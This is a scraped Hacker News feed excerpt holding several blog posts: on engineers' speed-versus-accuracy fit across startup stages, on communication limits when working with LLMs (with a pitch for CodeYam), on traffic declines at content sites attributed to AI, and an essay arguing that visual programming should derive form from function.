
    Who excels here?

    • Engineers who are comfortable cutting scope to deliver fast.
    • Those who thrive in ambiguity and don't need a perfect spec.
    • People who enjoy building and rebuilding as feedback comes in.
    • Staying closely aligned with the founder/C-level people can be hugely beneficial here - make sure you understand the business goals and vision correctly, communicate your intentions, go build.

    2. The Scaling Startup (1 → 10 Phase)

    Once a startup finds product-market fit, things shift. Growth means technical debt starts catching up, and what worked in the early days starts breaking.

    At this stage, accuracy starts to matter more. The company needs engineers who:

    • Think beyond today's solution and plan for the next 6-12 months.
    • Introduce better testing, automation, and architecture.
    • Push back against reckless speed when it threatens stability.

    The engineers who thrived in the early chaos might struggle here. A speed-focused engineer who loved hacking together an MVP may find the new focus on documentation, testing, and code quality frustrating.

    Who excels here?

    • Engineers who balance pragmatism with structure.
    • People who enjoy building reliable systems rather than chasing constant new features.
    • Those who can see the bigger picture and influence long-term decisions.
    • At this stage, in my CTO roles, I've stepped back and zoomed out, whilst other engineers have continued shipping features. It gives me the chance to add the stability to the product that was skipped over to "get it out there".

    3. The Enterprise or Regulated Industry (10 → 100 Phase)

    At enterprise scale, everything slows down. When a single bug could cause millions in losses or legal trouble, accuracy is king.

    Here, speed-focused engineers often feel handcuffed by bureaucracy. There's process, governance, and an expectation of predictable, well-tested releases.

    The best engineers in these environments:

    • Love digging into complex systems and making them robust.
    • Care deeply about consistency, compliance, and security.
    • Accept that things take time and focus on minimizing risk.

    For engineers who are happiest when shipping fast and breaking things? This can feel like a slow-moving nightmare.

    Who excels here?

    • Engineers who enjoy optimizing for scale and efficiency.
    • Those with patience for detailed planning and process-heavy work.
    • People who appreciate long-term code stability over quick wins.
    • I personally have to completely re-align my mindset when working with these companies - it doesn't naturally suit my working style, so I have to consciously slow down and amend my own expectations for how much I'm able to ship with the expedience I'm accustomed to.

    Finding the Right Fit for You

    If you've ever felt out of sync in a role, chances are it wasn't about skill—it was about fit.

    Questions to ask yourself:

    1. Do I get frustrated by slow decision-making?

      • If yes, you likely lean toward the speed-focused side.
    2. Do I feel uncomfortable shipping something I know isn't perfect?

      • If yes, you lean more towards accuracy.
    3. Do I prefer structured, well-defined work over ambiguity?

      • Accuracy-focused engineers thrive on clear problem spaces, while speed-focused ones embrace chaos.
    4. What excites me more—shipping a quick prototype or refining a system over time?

      • The first is speed; the second is accuracy.

    Recognizing your default mindset can help you find the right companies, teams, and roles where you'll thrive. If you can develop an awareness of your instinctive mindset, you can employ methods to consciously alter your working style, for the betterment of your own sanity and the success of the company.


    Advice for Engineering Leaders

    If you're hiring or managing engineers, understanding this spectrum is critical. The best teams blend both types of engineers strategically.

    • Early-stage startups? Hire for speed, but ensure someone can clean up tech debt later.
    • Scaling teams? Introduce structure without crushing momentum.
    • Enterprise teams? Protect stability, but don't let process stifle innovation.

    A great engineering culture values both ends of the spectrum—and allows engineers to shift across it as their careers evolve.

    I've managed and led teams where I've had engineers at opposite ends of the spectrum - being aware of this polarity can help decide who might be best suited to various tasks and features when it comes to planning the product.


    Final Thoughts

    Whether you're an IC or a CTO, recognizing the speed vs. accuracy spectrum can help you:

    • Find the right roles and companies that match your strengths.
    • Adapt as your career progresses and new challenges arise.
    • Build engineering teams that complement each other instead of clashing.

    The best engineers don't just write great code—they understand how to apply their strengths to the right problems, at the right time.



    ]]>
    https://benhowdle.im/software-engineer-spectrum.html hacker-news-small-sites-43206690 Fri, 28 Feb 2025 15:30:20 GMT
    <![CDATA[AI can't read your mind but iteration is expensive]]> thread link) | @nadis
    February 28, 2025 | https://blog.codeyam.com/p/ai-cant-read-your-mindbut-iteration | archive.org

    AI capabilities are rapidly improving. It’s difficult to predict exactly how good AI can become and on what timeframe those changes will occur. Regardless of how sophisticated AI becomes, one fundamental challenge persists: communication. Effectively communicating with LLMs remains an under-appreciated problem that will arguably hold back the value of AI, no matter how good it gets.

    This challenge isn't unique to AI collaboration. Communication becomes a bottleneck whenever we work on complex projects with multiple “intelligent” actors involved (i.e. people or AI). Translating our thoughts with perfect fidelity is fundamentally impossible without some hypothetical mind-reading technology that doesn't yet exist. Even then, our thoughts are often more superficial and inconsistent than we realize.

    Every attempt to convey a complex idea inevitably loses something in translation. Whether communicating with humans, computers, or AI agents, perfectly transferring your mental model to another actor is an unrealistic expectation. The recipient's inherent biases and assumptions, combined with ambiguities in your explanation, guarantee some level of misinterpretation.

    With AI systems, these biases and assumptions often stem directly from their training data. If you have experimented with prompt engineering you have likely encountered this limitation firsthand.

    When you describe a task for AI to complete, the system makes assumptions about our instructions and how to implement them based on patterns in its training data. For instance, when asked to write tests for JavaScript code, AI systems will often default to Jest, a popular testing framework heavily represented in training datasets, even when no framework is specified. This is usually a good thing, as it represents a shared context between you and the AI, but if that context is not appropriate, the assumption will cause problems.

    Even when explicitly instructed not to use Jest, AI models frequently revert to outputs that include Jest. The statistical weight of Jest in the training data effectively overrides your specific instructions, demonstrating how deeply ingrained these patterns become.
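
    To make that drift concrete, here is a minimal sketch. The add module is hypothetical; the point is the visible difference between the requested framework (Node's built-in node:test runner) and the Jest idioms a model habitually reaches for:

    import { test } from "node:test";
    import assert from "node:assert/strict";
    import { add } from "./add"; // hypothetical module under test

    // What was asked for: a test using Node's built-in runner.
    test("add sums two numbers", () => {
      assert.equal(add(2, 3), 5);
    });

    // What a model trained mostly on Jest often produces instead,
    // even when explicitly told not to use Jest:
    //
    //   describe("add", () => {
    //     it("sums two numbers", () => expect(add(2, 3)).toBe(5));
    //   });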

    This pattern repeats across all kinds of communication. It's practically impossible to provide sufficiently detailed specifications for even moderately complex ideas. And since the AI's assumptions are not visible to you, you cannot easily predict how the AI will interpret your request.

    Even if you could somehow painstakingly articulate every necessary detail, the recipient must also perfectly process and integrate all that information. At some point the level of detail becomes so great that it can no longer be held in memory all at once. Even if that were not a problem, specifying anything at this level of detail while navigating unknown assumptions is practically impossible.

    This creates a significant obstacle whenever we collaborate on complex projects. Communication becomes a bottleneck filled with hidden challenges that only become apparent after a misstep reveals a misunderstanding.

    There are two primary approaches we can use to tackle this challenge: iteration and tools.

    Despite our wish to simply describe a task to AI and have it execute flawlessly without further guidance, this rarely succeeds for complex tasks. As complexity increases, so does the likelihood of AI diverging from our intended path. The longer we wait to validate results, the further off-track the work becomes.

    Iteration provides tremendous value in managing this risk. By breaking tasks into smaller components and validating results after each stage, we can ensure the AI remains aligned with our goals.

    However, this approach comes at a cost. You must invest time in validating the AI's output, which can undermine desired efficiency gains. If validation requires as much time as performing the original task yourself without AI, then the AI adds no value. In fact, the process potentially becomes more expensive when accounting for both the AI costs and your time costs.

    Now, it is possible that AI could become so powerful and inexpensive that simply giving it vague instructions and letting it try to accomplish a complex task is still worthwhile. In such scenarios, even mostly incorrect outputs might deliver enough value to justify the attempt, especially if the AI occasionally produces excellent results quickly and cheaply.

    This scenario seems unlikely, however. Historically, more powerful AI models have commanded higher prices. Expecting dramatically more capable AI at lower costs would require simultaneous breakthroughs in technology, business models, and operational efficiency. This is possible, but improbable, in the near-term.

    Even with hypothetical ultra-powerful, ultra-affordable AI, the communication challenge should not be underestimated. Complex projects like software development involve countless potential misunderstandings that compound over time, making quality outcomes from casual instructions highly unlikely.

    This is where tooling becomes crucial. Imagine you're fortunate enough to receive an AI-generated solution that's 80% aligned with your vision. The challenge then becomes articulating how to refine that complex result to match your ideal more closely.

    Trying to discuss complex ideas is very difficult if you don’t have ways to isolate specific aspects of that complex idea so that both parties know what exactly is being discussed. See also: Software Development with AI: Isolation and Abstraction.

    Imagine trying to edit a book without being able to refer to a chapter, page, or sentence in that book. It would be extremely difficult to ensure that there weren’t further miscommunications that then need to be fixed or discarded.

    The right tools dramatically simplify this process. When a tool enables navigating complex systems to isolate specific components for collaboration, you substantially reduce the complexity of the interaction. Both actors can focus on a smaller amount of context and discuss it more easily.

    More importantly, tools can provide interfaces for iterating on complex systems beyond text-based communication. For user interface design, as an example, you need visual tools that display the actual design rather than just text descriptions. You need to identify specific elements (isolation), and ideally make quick, verifiable edits to that design.

    Collaborating on complex projects like software applications will never be trivial. Even with hypothetical mind-reading technology that could extract your vision and execute it, you would likely evolve your thinking as you experienced the result and gathered feedback.

    For instance, you might overlook edge cases or user experience variations. This is particularly likely to occur when building complex applications with numerous potential states. Complex projects inevitably require frequent iteration, whether collaborating with humans and/or AI.

    We should focus significant effort on creating tools that allow us to easily isolate specific parts of a complex project, see and interact with those isolated parts more easily, and make changes to those isolated parts that can be easily validated. While this won't eliminate iteration costs entirely, it will significantly reduce them, making complex collaborations with both people and AI substantially more effective.

    This is why we’re building CodeYam. We’re creating a tool that deconstructs software projects down to individual functions. We demonstrate how these functions operate by testing them with various data scenarios, capturing results as either data outputs or, for front-end functions like React components, as screenshots or interactive components on a simple static website. This approach simplifies validation of, collaboration around, and AI-assisted modifications to complex software projects.
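
    As a rough illustration of the general technique described above (scenario-based function snapshots), here is a toy sketch. All names are invented for illustration; this is not CodeYam's actual API:

    // A toy sketch of scenario-based function snapshots. All names are
    // invented for illustration; this is not CodeYam's actual API.
    type Scenario<A extends unknown[]> = { name: string; args: A };

    function runScenarios<A extends unknown[], R>(
      fn: (...args: A) => R,
      scenarios: Scenario<A>[],
    ): Record<string, R> {
      // Capture each scenario's output so later changes to `fn` show up
      // as diffs against previously recorded results.
      const snapshots: Record<string, R> = {};
      for (const s of scenarios) {
        snapshots[s.name] = fn(...s.args);
      }
      return snapshots;
    }

    // Example: exercising a pricing function against a few scenarios.
    const price = (qty: number, unit: number) => qty * unit;
    console.log(runScenarios(price, [
      { name: "single item", args: [1, 9.99] },
      { name: "bulk order", args: [100, 7.5] },
    ]));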

    CodeYam helps software teams increase confidence in code changes by making it easier to discover if a change is having the intended impact, or introducing bugs or side effects, via software simulations. These simulations provide test coverage, help teams understand the state of and any changes to their application, and can be used for documentation, demos, and collaboration. To learn more, please contact us or join the waitlist.


    ]]>
    https://blog.codeyam.com/p/ai-cant-read-your-mindbut-iteration hacker-news-small-sites-43206566 Fri, 28 Feb 2025 15:20:37 GMT
    <![CDATA[AI is killing some companies, yet others are thriving – let's look at the data]]> thread link) | @corentin88
    February 28, 2025 | https://www.elenaverna.com/p/ai-is-killing-some-companies-yet | archive.org

    AI is quietly upending the business models of major content sites. Platforms like WebMD, G2, and Chegg - once fueled by SEO and ad revenue - are losing traffic as AI-powered search and chatbots deliver instant answers. Users no longer need to click through pages when AI summarizes everything in seconds. Brian Balfour calls this phenomenon Product-Market Fit Collapse, a fitting term, marking it as the next big shift in tech.

    Key milestones accelerating this shift:
    📅 Nov 30, 2022 – ChatGPT launches
    📅 Mar 14, 2023 – GPT-4 released
    📅 May 14, 2024 – Google rolls out AI Overviews

    ❗Disclaimer: I'm simply observing traffic trends from an external perspective and don’t have insight into the exact factors driving them. The timing aligns with AI, but like any business, multiple factors are at play and each case is unique.

    → The data comes from SEMRush. If you want access to trend reports like the one below, you can try it for free.

    WebMD: Where every symptom leads to cancer. They're crashing and burning and the timing aligns with major AI releases. If they don’t launch AI agents (like yesterday), they’re in trouble. That said, they still pull in ~90M visits a month.

    Quora: Once the go-to platform where user-generated questions got a mix of expert insights and absolute nonsense - is struggling. And it’s no surprise. AI now delivers faster, (usually) more reliable answers. Yet, despite the challenges, Quora still pulls in just under 1 billion visits a month.

    Stack Overflow: The Q&A platform for developers, is now facing seemingly direct competition from ChatGPT, which can generate and debug code instantly. As AI takes over, the community is fading - but they still attract around 200M visits a month.

    Chegg: A popular platform for students - now getting schooled by AI. Weirdly, they’re fighting back by suing Google over AI snippets. Not sure what they expect… Google controls the traffic and that’s the risk of relying on someone else’s distribution.

    G2: A software review platform is experiencing a huge drop in traffic. This one is so rough.

    CNET: A technology news and reviews website is experiencing a 70% traffic drop from four years ago. They still pull in 50 million visits per month - an impressive volume - but that's a steep drop from the 150 million they once had.

    Just look at Reddit. Many say they are impacted, but traffic says otherwise - they are CRUSHING it. Probably because people are gravitating toward authentic content and a sense of community. I know I cannot go a day without a Reddit scroll (/r/LinkedInLunatics alone is worth visiting on the daily). And look at the y-axis: their traffic is in the billions!

    And even Wikipedia is managing to stay afloat (although research AI tools will probably hit it pretty hard). Also, over 5B visits a month - consider me impressed.

    And you know who else is growing? Substack. User-generated content FTW.

    Edited by Melissa Halim

    ]]>
    https://www.elenaverna.com/p/ai-is-killing-some-companies-yet hacker-news-small-sites-43206491 Fri, 28 Feb 2025 15:12:54 GMT
    <![CDATA[Visual programming is stuck on the form]]> thread link) | @praptak
    February 28, 2025 | https://interjectedfuture.com/visual-programming-is-stuck-on-the-form/ | archive.org

    Underlying great creations that you love—be it music, art, or technology—its form (what it looks like) is driven by an underpinning internal logic (how it works). I noticed this pattern while watching a talk on cellular automaton and realized it's "form follows function" paraphrased from a slightly different angle. Inventing a form is a hard task, so you must approach it obliquely—by first illuminating the underlying function.

    This made me realize something crucial about visual programming: it’s stuck on form, rather than letting form follow function. Visual programming has long been trapped in the node-and-wires paradigm because its designers are overly fixated on form, neglecting the underlying function that should drive it. As a whole, the field is stuck in a local minimum. How can we break out of it, and how can we find a function for the field that underpins the form?

    A clue from CellPond

    I was watching Lu Wilson's talk about CellPond–a visual programming language that expanded my expectations for cellular automata–and was struck not just by the presentation but by a specific quote. And that's despite having already seen my share of the Game of Life by John Conway and read lots of A New Kind of Science by Stephen Wolfram.

    But even though Lu Wilson spent the last 10 minutes showing you the fantastic visuals, none of that was the point. The actual tasty result is that there is a virtual machine with only four operations underlying the CellPond system. And these four operations correspond with memory operations we're familiar with in CPUs: read, write, allocate, and deallocate. To me, that connection was utterly surprising. The grid of patterns (form) was informed and driven by the underlying virtual machine (function).

    "I think if you were to learn from CellPond, you'd take away not just the UI—but you can take the UI too if you want. I was very surprised by this because, in all my reading of past solutions to these problems, they were all about the high-level user interface; they were about the UI. I thought I'd have to build layers upon layers of UI, but really, as soon as the low-level stuff was sorted out, the UI just figured itself out."
    - Lu Wilson (🐤 · 🦋)

    I wondered: how did Lu Wilson come up with the underlying function? It seemed magical. This puzzling revelation made me realize it wasn’t just about the UI—there was a deeper principle at play.

    Form follows function

    In the subsequent months, I kept turning it over in my head. The key lay with the opening quote.

    When you figure out the low-level stuff, the UI all falls into place.

    It wasn't until a drive while I was listening to Paul Graham's A Taste for Makers that I made the connection. The CellPond talk was a demonstration of the oft-repeated adage of "form follows function." Here's the relevant excerpt:

    In art, the highest place has traditionally been given to paintings of people. There is something to this tradition, and not just because pictures of faces get to press buttons in our brains that other pictures don't. We are so good at looking at faces that we force anyone who draws them to work hard to satisfy us. If you draw a tree and you change the angle of a branch five degrees, no one will know. When you change the angle of someone's eye five degrees, people notice.

    When Bauhaus designers adopted Sullivan's "form follows function," what they meant was, form should follow function. And if function is hard enough, form is forced to follow it, because there is no effort to spare for error. Wild animals are beautiful because they have hard lives."
    - Paul Graham A Taste for Makers

    Honestly, I had never thought much about "form follows function." It seems obvious enough when you hear it for the first time. Sure, given an interface, why else would it express anything other than its purpose? It would seem counterproductive otherwise.

    It wasn't until I was forced to invent a form did I really understood what it meant. The adage "form follows function" is for those tasked to invent the form, not for when you're given it. In my own words, it's this:

    If a design is any good, how something looks, feels, and works is a naked expression of its function, its algebra, its rationality–its underlying nature. To design a form, you should not just come up with it out of thin air. You have to attack the problem obliquely and work out its function first. Once the function–the underlying nature, internal consistency, and algebra–is worked out, the form will fall out as a consequence of it.

    Three faces of function

    What I mean by "underlying nature" isn't that it exists independently of human creation; rather, every design is embedded in an environment that shapes its intrinsic properties. The function of anything useful is always in the context of its environment. When we understand the context of a well-designed thing, we understand why it looks the way it does. An animal form reflects its adaptation to the ecological niche in its environment.

    By "rationality", I mean some kind of internal consistency. The function of something well-designed will have a certain repeated symmetry. Given a choice of design, it'll consistently use the same thing in as many scenarios as possible. Good game design enables a single item to serve multiple functions. The gravity gun in Half-Life 2 enables players to pick up and launch objects. It's used for turning environmental items into weapons, solving physics-based puzzles, and for navigating hard-to-reach areas. In Minecraft, the water bucket can extinguish fires, create waterfalls for safe descent, irrigate farmland, and serve as a barrier against certain enemies.

    By "algebra", I mean a set of rules about how a design's components compose. Most games have a physics engine that computes how objects in a game interact with each other in space. It's a "movement calculator." Legend of Zelda: Breath of the Wild additionally has a chemistry engine that it uses to compute how different materials interact with each other. It's a "state calculator."

    In summary, function represents the intangible structure governing the relationships, interactions, and contextual fit of a design’s underlying components. A form can't exist outside of its function, and its function is shaped by its environment. We can observe and interact with the form directly, but not its function. We can exist in the environment, but the function is invisible to us without a lot of work to infer it.

    A form not informed by function feels disjointed, inconsistent, and frustrating. Without an underlying function to underpin the form, the shape of form is simply at the inconsistent whims of the designer. Functions keep designers honest about the purpose of form: in service of function. Of course you can explore and play with form independent of function, but that's the jurisdiction of art, not design.

    To invent a form, start with the function

    "Form follows function" is advice for people making something, especially those whose work has a very visible interface facing the end user. To invent a form, start with the function. But it's easy to make errors of two kinds, even if you already know this in your head.

    The first kind of error is to pursue form without considering function. Instead, you must ignore the form, at least initially, and focus on figuring out the function first. This is largely due to the intangible nature of function. It's an easy mistake to focus on form, even far into your creative career.

    This mistake is understandable. Whenever people interact with anything, their initial contact is the interface—the bridge between user and design. For anyone new to something, it's natural to start by engaging with that interface, because it's what they're most familiar with. So when they turn around to make something in that domain, they start with the interface, the form. You can see this readily: new creatives in a field start by copying the masters before finding their own voice.

    It's also understandable because function is largely more abstract and more intangible than form. It's harder to get a grip on something amorphous, and you may have to start off with something concrete. It can be part of the process to draw up concrete examples first. In fact, when confronted with an unfamiliar domain, this can be quite productive in getting a handle on it. But it can be easy to forget and take a step back and ask: "what is the common underlying logic or abstraction to all these examples?" When you are able to take a step back, you're using the concrete examples as a stepping stone to figuring out the underlying function.

    The error of the second kind is pursuing function without considering the user. As a warning for those that lean too far on the other side of the precipice, this doesn't mean you can ignore the end user when figuring out the function. If we could represent the utility of the underlying function as a vector, it would still need to point in the direction of the user. The underlying function must support and give context to the visible form built on top. Both are built so the direction and magnitude of their utility vector can support the user in the direction of their goals.

    Too many back-end engineers misinterpret 'form follows function' as a license to design arbitrary database tables and APIs, assuming that the front end will compensate. That's how we get terrible interfaces where the end user needs to be aware of the data model to use it effectively, like Git.

    When it comes to visual programming, I think it's stuck in the error of the first kind, with its focus on form.

    Visual programming is not just node-and-wires

    Node-and-wire diagrams have become a lazy default. Most visual language designers never ask whether those boxes and arrows genuinely help programmers. It’s a classic case of letting form precede function.

    When one looks through the Visual Programming Codex, it's obvious an overwhelming majority are based on the node-and-wires model. Not just that, but there are mostly only two variations:

    1. The nodes represent data, and the wires represent functions
    2. The nodes represent functions, and the wires represent data shunted between functions.

    Did many of them settle on it because it's the best visual representation to help aid the process of programming? Or did they use it because they're mimicking an existing form?

    I think node-and-wires is popular because visual programming designers make the fundamental assumption that the underlying nature and logic of programming is just traditional textual programming. If that's your assumption, then you'd naturally think all you have to do is find visual representations for existing textual language constructs. Hence node-and-wires is the form you get when you take pure functions as the underlying function.

    At first glance, node-and-wires seem like a good fit. The wires going into a node are like the input parameters of a pure function, and the wires going out are like the output value. But what about differentiating between the definition of a function versus calling it? Often in node-and-wires visual languages, there's no separation. The definition is the application. What about passing around functions or thunks? Much of the power in pure functional programming lies in the power of higher-order functions, and I haven't seen a very good node-and-wires representation of that. After decades of trying, most pure functional programming is still largely expressed in text. To me, that's damning evidence against the practice of using nodes-and-wires to model functions. Text is still the better form for expressing the underlying logic of functional programming.
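
    As a concrete example of the difficulty, consider an ordinary higher-order combinator (a sketch in TypeScript, not tied to any particular visual language). The function being passed around is a value, so it has no natural place as either a box or a wire:

    // A retry combinator: takes a function and returns a wrapped function.
    // In a node-and-wires diagram, what is `withRetry`? A box whose input
    // and output are both other boxes? The wiring metaphor breaks down.
    function withRetry<A extends unknown[], R>(
      fn: (...args: A) => R,
      attempts: number,
    ): (...args: A) => R {
      return (...args: A): R => {
        let lastError: unknown;
        for (let i = 0; i < attempts; i++) {
          try {
            return fn(...args);
          } catch (e) {
            lastError = e;
          }
        }
        throw lastError;
      };
    }

    const parseWithRetry = withRetry(JSON.parse, 3); // functions as values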

    Imperative programming with node-and-wires fares no better. A loop in LabVIEW gives no more advantage or clarity than writing it in text. Seeing the totality of a sequence of steps in parallel in a circuit-like diagram doesn't solve the fundamental problem with imperative programs; it doesn't help the developer understand combinatorial state explosions or state changes over time.

    I think where node-and-wires have provided the biggest advantage is in specific domains in which a) there's massive value to examine intermediate data and values between transformations and b) there's a well-known visual representation of that intermediate data and value. This has been demonstrated in visual languages like Unreal Engine's Blueprint for game programming shaders and Max/MSP for sound synthesis in music. But these have been limited to these narrow domains. Visual programming has not found a foothold in general purpose programming domains.

    Modeling problems

    What then, if not node-and-wires? The aim here is to uncover an alternative underlying logic—one that can more effectively drive the form in visual programming. How would you go about finding another underlying function in "form follows function" if not the current programming paradigms we know? I think this is the wrong question. Although correct in direction and spirit, I think a better question is: how should we model problems that can leverage the computational power of our visual cortex?

    We write programs primarily to model and solve real-world problems. We go through the exercise of encoding the problem model in programming languages, because we can automate the generation of solutions. And the reason why we keep banging on the visual programming door is because we understand intuitively that our visual cortex is an under-leveraged power tool.

    The human visual cortex is a powerful pattern recognition apparatus. It can quickly compare lengths, distinguish foreground from background, recognize spatial patterns, and other amazing feats of perception, all at a glance. We leverage it in data visualizations to make sense of large quantities of data, but we haven't been able to leverage it to make sense of computational systems.

    ❓"Imagine what a visual programming language would look like if it was able to leverage the power of the human visual cortex" For the record, I don't think this is it.

    If we had a visual programming language that could leverage the human visual cortex, then at any zoom-level of abstraction, at a glance we could understand the overall structure of the program as it relates to the domain at that level of abstraction. And if we were looking at a running program, then we could get an idea of the overall state and process. Yes, we have bespoke visualizations of running programs in the form of metrics and dashboards. But we don't have a universal visual language to represent the structure or state of a program that applies to different programs.

    What about text? Aren't textual glyphs a kind of visual language? Not in the way I mean. For text to be considered a visual programming language, it'd have to leverage the human visual cortex at different zoom-levels of the program. Certainly, with syntax highlighting we leverage the visual cortex and use color to distinguish between different syntactical elements. This counts. But we only get this at the level of a function. It doesn't apply when we zoom out to the overall structure of the code base. And there's certainly no zoom-out level in which we get visual understanding at the level of the problem domain.

    The closest thing I can think of that might fit the bill is APL and its ilk. By condensing operators into single characters, sequences form idioms. Just as we recognize whole words rather than individual letters, idioms allow us to comprehend entire operations without parsing each symbol. So as you zoom out of the code, you can see the meaning of the code by identifying common idioms. Strangely, it seems many APL environments don't feature syntax highlighting.

    So if visual programming is to be useful, I think the angle of attack is to find a way to model problems, and this might not be the same way that we model problems in textual languages–even if the underpinning implementation is all lambdas and Turing machines. So how do we model problems?

    Entities and relationships

    I'll say up front, I don't know what modeling problems should look like. Nonetheless, it seems there are two main aspects for any system we're interested in:

    1. visually representing the entities in a problem domain
    2. visually representing the entity relationships.[2]

    Regardless of the paradigm, imperative, object-oriented, functional, or logical, there are both "entities" (structs, objects, compound values, terms) and "how they relate" (imperative processes, messages, functions, rules and predicates). If I had to take a stab at it, I'd start here.

    Of the two, representing the different entities in a problem domain seems more amenable to visual programming because they're nouns. Most of the things we see around us are nouns. Hence, we can imagine that inert data representing entities would have a canonical visual representation. But even then, entities often have far more attributes than we might want to visualize at a time to understand their purpose and behavior. How do we choose which attributes are important to show? And what should be the visual form for the attributes in these entities?

    The two questions are related, but to drive the point home, I'll focus on the second one. If we have some struct with two attributes in some generic language, how would we visually represent them?

    struct Foo {
      bar: float,
      baz: float
    }

    We might think a universally useful representation of a collection of these instances is two histograms: one for bar and one for baz. For any given instance, its corresponding value could be highlighted on the histogram.

    Is this useful? The answer depends on our task at hand. There's no one-size-fits-all visualization of entities. What if I told you bar is an x-coordinate and baz is the y-coordinate? Now, perhaps a more fitting visualization is a scatterplot where each instance is represented as an x. We put bar and baz in a spatial relationship to see if our visual cortex can recognize a pattern.

    In the histogram visualization, I wouldn't be able to use my visual cortex to discern that the relationship between bar and baz traces out a flower. However, in the spatial canvas visualization, I could easily see the flower trace because by pitting bar and baz in a spatial relationship, I'm creating a mapping that makes an affordance for my visual cortex.

    This only worked because there was a spatial relationship between bar and baz, especially if I know they represent x and y coordinates. We couldn't just look at the data and easily discern what visualization to use. The label and the intention of the user also give meaning to what visualization is best suited for an entity. Hence, I think there's no one-size-fits-all visualization for entities. There's no single mapping of attributes to visualizations that makes sense, unless the user's intention and goals remain fixed.

    Besides entities, every program encodes relationships between its entities. How do we visually represent their relationships in a way that's illuminating at a glance without devolving into an illegible spaghetti mess? Relationships can be harder to model, because they're typically invisible to us, as they're often inferred.

    Like the example with representing entities visually, representing relationships visually is likely to depend on both the goals of the user as well as the meaning of the entities at hand. I suspect a good visual representation of the relationship between two tables in a query is going to be different than a good visual representation of the relationship between two pieces of middleware in a web stack. However, I do think we can do better than a line.

    The go-to representation of a relationship is often the line or an arrow, connecting two things on the canvas. The trouble with lines is that they don't scale with the visual cortex. After a couple dozen lines, we lose track of any sense of the overall relationships between entities. But I don't think this can be the only way. The visual cortex also relates visual elements if they have the same color or if they're spatially clustered together. As the previous plot of bar and baz showed, relationships can be spatial: we can position entities spatially to reveal relationships without drawing lines and arrows everywhere.

    As before, it's hard to draw any generally productive conclusions on how to best visually represent relationships between entities without knowing the goal of the user as well as the meaning behind the entity and relationships we're trying to represent. The only point I'm trying to drive home is that we have more tools at our disposal besides lines and arrows, because the visual cortex is perceptive and discerning about colors, groupings, and motion. We typically use these visual elements haphazardly, if at all, rather than as a deliberate attempt to leverage it for understanding. And that's just in graphic design and data visualization. It's completely overlooked in program structure, debugging, and domain problem modeling.

    At this point, those that hear entities and relationships might be drawn to ask, isn't this just object-oriented programming? It is true that object-oriented thinking trains you to identify entities in the problem domain and model their relationships through method calls and messaging. However, object-oriented programs suffer from private state whose effects are observable from the outside littered everywhere, making it hard to reason about program behavior. What I'm saying is orthogonal to and doesn't invalidate what we've learned about structuring programs in the past 3 decades. To sum up, I'm saying the unit of representation for visually representing programs may not be the function and its input and output parameters, as node-and-wire visual programmers are likely to do. It might be something else, which can leverage the power of the visual cortex.

    Computation is figuring out the next state

    Modeling problems as entities and their relationships is only half the equation. By only modeling entities and their relationships, we've only described a static world. We can do that already without computers; it's commonly done on whiteboards in tech companies around the world. Every time we go up to the whiteboard with a coworker to talk through a problem, we're trying to leverage the power of our visual cortex to help us reason through it. But unlike our textual programs, whiteboards aren't computational.

    If whiteboards were computational, they might show how the state of the problem changes over time, or how it changes in response to different external inputs or effects. Thus, the question is, how do we visually represent how the system state should evolve over time or in response to external inputs? [1]

    Cellular automaton systems typically express computation through rulesets. Rulesets are typically expressed as a pure functional transformation between the current state and the next state. Taking rule 110 in a 1D cellular automaton as an example, the state of the next cell depends on the three cells above it: given the three-cell pattern above, the ruleset says what the cell in the next line should be. You can see this like a β-reduction, substituting symbols with other symbols until we can substitute no further, with the resulting value as our answer.

    The famous rule 110 in 1D cellular automaton. This rule is Turing Complete!
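
    For reference, here is a minimal executable sketch of rule 110 (assuming wrap-around edges, which the diagram doesn't specify). The ruleset is literally an eight-entry mapping from each three-cell neighborhood to the next cell's state:

    // Rule 110 as an explicit mapping: index each 3-cell neighborhood as
    // a 3-bit number; the entry is the next state of the middle cell.
    // These are exactly the bits of 110 (binary 01101110).
    const RULE_110 = [0, 1, 1, 1, 0, 1, 1, 0];

    function step(cells: number[]): number[] {
      return cells.map((cell, i) => {
        const left = cells[(i - 1 + cells.length) % cells.length];
        const right = cells[(i + 1) % cells.length];
        return RULE_110[(left << 2) | (cell << 1) | right];
      });
    }

    // Start from a single live cell and print ten generations.
    let row = Array.from({ length: 32 }, (_, i) => (i === 30 ? 1 : 0));
    for (let gen = 0; gen < 10; gen++) {
      console.log(row.map((c) => (c ? "█" : " ")).join(""));
      row = step(row);
    }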

    As the CellPond talk at the top of the page points out, rulesets for more complicated behaviors, like trains on tracks, have a combinatorial explosion of rules. One of CellPond's innovations was to have rulesets that represent (or generate?) groups of rulesets, so that visually expressing the rulesets remains tractable for humans.

    But pure functions are just mappings. Any pure function can be replaced by an equivalent infinite table of key-value pairs. Rulesets are just explicit mappings of inputs to outputs. Hence, if rulesets are to be tractable, we must be able to express not just how a single current state maps to the next state, but how entire groups of states map to a next state.

    We have familiar mechanisms in textual programming to express a selection of groups of input states in a succinct way. We have boolean logic in if expressions. We have maps and filters. We have select and where clauses in SQL queries. But we have no universal and composable ways of expressing this selection of previous states and mapping them to next states. Additionally, we don't have universally recognized ways of expressing this mapping from groups of inputs to outputs for state types other than a grid of cells.
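
    As a sketch of what mapping groups of states could look like in code (not CellPond's actual mechanism), a rule can pair a predicate that selects a whole group of states with a function that computes the next state:

    // A rule pairs a predicate selecting a group of states with the
    // transformation to apply. A sketch, not CellPond's mechanism.
    type Rule<S> = { matches: (s: S) => boolean; next: (s: S) => S };

    function applyRules<S>(rules: Rule<S>[], state: S): S {
      const rule = rules.find((r) => r.matches(state));
      return rule ? rule.next(state) : state; // unmatched states stay put
    }

    // Two predicate rules cover what would otherwise be an unbounded
    // table of (state -> next state) pairs:
    const collatz: Rule<number>[] = [
      { matches: (n) => n % 2 === 0, next: (n) => n / 2 },
      { matches: (n) => n % 2 === 1, next: (n) => 3 * n + 1 },
    ];
    console.log(applyRules(collatz, 7)); // 22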

    A different way forward

    Certainly, the multi-dimensional aspects of a codebase could be quite hard to represent in their entirety visually. But I don't think it's a stretch to say that we lean pretty hard on the symbolic reasoning parts of our brain for programming, while the visual reasoning parts are underleveraged.

    Visual programming hasn't been very successful because it doesn't help developers with any of the actual problems they have when building complex systems. I think this is a result of ignoring the adage "form follows function" and trying to grow a form out of traditional programming paradigms that fail to provide good affordances–the utility vector is pointing the wrong way–for those actual problems in complex systems. To make headway, I think we should focus on discovering underlying logic and function of how to model problems visually on a canvas–not just the entities, but also their relationships. In addition to modeling problems, we also have to discover how to model transformations and transitions of state, so our models are also computational.

